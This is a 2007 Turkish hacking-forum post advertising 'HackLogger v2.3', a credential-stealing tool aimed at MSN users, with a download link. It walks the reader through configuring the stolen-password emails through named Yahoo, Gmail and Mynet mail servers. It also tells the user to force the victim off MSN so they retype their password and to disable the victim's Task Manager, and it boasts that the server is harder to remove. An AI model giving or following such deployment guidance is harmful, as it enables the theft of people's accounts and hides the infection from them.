---NewLand---
[ En son gönderilenler · Üyeler · Forum kuralları · Ara · RSS ]
  • Page 1 of 1
  • 1
Forum » Chat [msn, yahoo, icq, irc, googletalk...] » Msn » HackLogger v2.3 - MSN Hack burda bitiyor...
HackLogger v2.3 - MSN Hack burda bitiyor...
robot-uyeTarih: Wednesday, 2007-11-14, 1:56 PM | Mesaj # 1
Colonel
Vazifesi: Moderator
Karizma: 3
Status: Çevrim dışı
Programdan bir ekran görüntüsü:

İçerik:
|1.Tanıtım|
|2.Kullanım|
|3.Yenilikler|
|4.Download|

||1.Tanıtım||

Merhaba SiberOrdu.Com üyeleri,
HackLogger ın bu sürümü diğer sürümlerine göre daha gelişmiş.Program tamamen hack için yazıldı ama programın yaratacağı yasal yaptırımlardan kullanıcı sorumlu coder asla sorumluluk kabul etmez.

||2.Kullanım||

Öncelikle açalım HackLogger ı sonra giriş kodumuzu mailimize isteyelim.Sonra açılsın program.Ardından o SMTP adres olarak ;
Yahoo Mail İçin:
mx1.mail.yahoo.com
mx2.mail.yahoo.com
mx3.mail.yahoo.com
mx4.mail.yahoo.com
adreslerinden birini,
Gmail için:
gsmtp185.google.com
gsmtp185-2.google.com
Mynet için:
mail.mynet.com

sunucularını seçiyoruz.Gmail ve yahooda hepsini test edin hangisi çalısırsa onu seçin.
Ve sonra alta mailimizi yazalım.Sonra maillerin kaç dkde bir geleceğini seçelim.Eğer icon seçmediyseniz orda seçili olan icon çıkacaktır.Fakat icon seçmediginizde bi error alabilirsiniz onu kaale almayın.Hata mesajı ayarlarını herkez bilir o yüzden onu geçiyorum.Gelelim diğer ayarlara.Msnden düşür ayarını seçersek kurban proyu açtıgında msnden düşücek ve hem biz programı açtıgını anlıycaz hemde msnden düştügü için bir daha şifre girmesi gerekecek.Ayrıca Görev yöneticisi devre dışı bırakmayı mutlaka seçin.

||3.Yenilikler||
-Msnden düşürme
-Serverın temizlemesi zorlaştırıldı.
-Server boyutu %10 oranında küçültüldü.

||4.Download||
indir

-----------------
----------------
----------------
-----------------
----------------
----------------

Forum » Chat [msn, yahoo, icq, irc, googletalk...] » Msn » HackLogger v2.3 - MSN Hack burda bitiyor...
  • Page 1 of 1
  • 1
Search:

Copyright Newland © 2024 Free web hostinguCoz